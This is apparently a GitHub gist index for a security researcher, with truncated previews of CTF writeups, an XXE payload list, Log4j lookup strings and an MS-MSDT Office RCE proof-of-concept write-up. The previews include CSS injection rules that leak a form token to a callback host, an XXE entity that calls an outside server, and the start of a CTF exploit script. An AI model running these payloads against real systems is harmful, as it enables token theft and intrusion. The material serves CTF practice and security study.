Simple JS Jail challenge.
It is run on context, so we have nothing but to play with constructor and console.
1337 === eval(our_input)
Abdillah Hasny abdilahrf
abdilahrf
/ a-z.md
Created
April 27, 2020 13:27
— forked from stypr/a-z.md
Harekaze CTF 2019 WEB Writeup (Yokosuka Hackers)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| input[name$=code_1][value^=a]{background-image: url(https://callback.yourdomain.com/callback?token=a&id=CODE_1);} | |
| input[name$=code_1][value^=b]{background-image: url(https://callback.yourdomain.com/callback?token=b&id=CODE_1);} | |
| input[name$=code_1][value^=c]{background-image: url(https://callback.yourdomain.com/callback?token=c&id=CODE_1);} | |
| input[name$=code_1][value^=d]{background-image: url(https://callback.yourdomain.com/callback?token=d&id=CODE_1);} | |
| input[name$=code_1][value^=e]{background-image: url(https://callback.yourdomain.com/callback?token=e&id=CODE_1);} | |
| input[name$=code_1][value^=f]{background-image: url(https://callback.yourdomain.com/callback?token=f&id=CODE_1);} | |
| input[name$=code_1][value^=g]{background-image: url(https://callback.yourdomain.com/callback?token=g&id=CODE_1);} | |
| input[name$=code_1][value^=h]{background-image: url(https://callback.yourdomain.com/callback?token=h&id=CODE_1);} | |
| input[name$=code_1][value^=i]{background-image: url(https://callback.yourdomain.com/callback?token=i&id=CODE_1); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import re | |
| url = "http://88.198.233.174:33534/index.php" | |
| payload = { | |
| "username":"", | |
| "password":"x", | |
| } | |
| def check(data): |
abdilahrf
/ burplist.py
Created
June 3, 2021 10:09
— forked from bendtheory/burplist.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import xml.etree.ElementTree as ET | |
| import urllib | |
| import base64 | |
| import math | |
| import sys | |
| import re | |
| # usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file. | |
| # python burplist.py burprequests.xml | |
| # output is saved to wordlist.txt |
abdilahrf
/ log4j-keywords
Created
December 12, 2021 03:24
— forked from bugbountynights/log4j-keywords
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ${ctx:loginId} | |
| ${map:type} | |
| ${filename} | |
| ${date:MM-dd-yyyy} | |
| ${docker:containerId} | |
| ${docker:containerName} | |
| ${docker:imageName} | |
| ${env:USER} | |
| ${event:Marker} | |
| ${mdc:UserId} |
abdilahrf
/ ms-msdt.MD
Created
June 4, 2022 05:42
— forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process
MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:
- Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
abdilahrf
/ frida-tips.md
Created
October 25, 2022 07:04
— forked from daniellimws/frida-tips.md
Frida tips
abdilahrf
/ XXE_payloads
Created
January 3, 2017 00:42
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
abdilahrf
/ Enable WSL and Ubuntu 16.04 on Windows 10.md
Created
December 8, 2022 13:51
— forked from xynova/Enable WSL and Ubuntu 16.04 on Windows 10.md
Enable WSL and Ubuntu 16.04 on Windows 10
References:
abdilahrf
/ -setup-windows-wsl-devenv.md
Created
December 9, 2022 13:36
— forked from leodutra/-setup-windows-wsl-devenv.md
Install and Setup Windows Subsystem 2 for Linux, Hyper, ZSH + Oh My Zsh + Powerlevel9k + plugins, FNM + VSCode (+ext) and Nerd Font
Windows Subsystem 2 for Linux, Hyper, ZSH + Oh My Zsh + Powerlevel9k + plugins, FNM + VSCode (+ext) and Nerd Font
To setup native Linux, see this gist
